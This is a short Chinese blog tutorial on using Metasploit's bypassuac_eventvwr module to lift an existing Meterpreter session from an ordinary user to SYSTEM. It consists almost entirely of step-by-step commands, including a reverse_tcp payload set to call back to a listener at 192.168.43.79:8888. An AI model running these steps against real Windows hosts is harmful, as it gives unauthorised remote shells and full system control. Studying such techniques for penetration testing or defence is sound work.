反弹msf之前也发了好几篇了,这里小伙子就直接利用已经反弹回来的meterpreter进行uac提权了
一.现在利用meterpreter的getuid进行查看权限,getuid.
这就是一个普通的用户
二.直接利用msf的getsystem尝试提权,getsystem
显示提权失败
三.把这个sessions后台运行,background
四.使用bypassuac模块,use exploit/windows/local/bypassuac_eventvwr
五.对参数进行设置
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.79(本机ip)
set LPORT 8888(本机接受的端口)
set target 1 (设置1为x64的,0为x86的,可以show targets进行查看)
set SESSION 1(指向我们刚刚后台运行的那个session)
运行生成一个新的session,exploit
进入新的session后,getsystem
getuid查看下权限
提权成功
感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!
文章来源: msf_bypassuac提权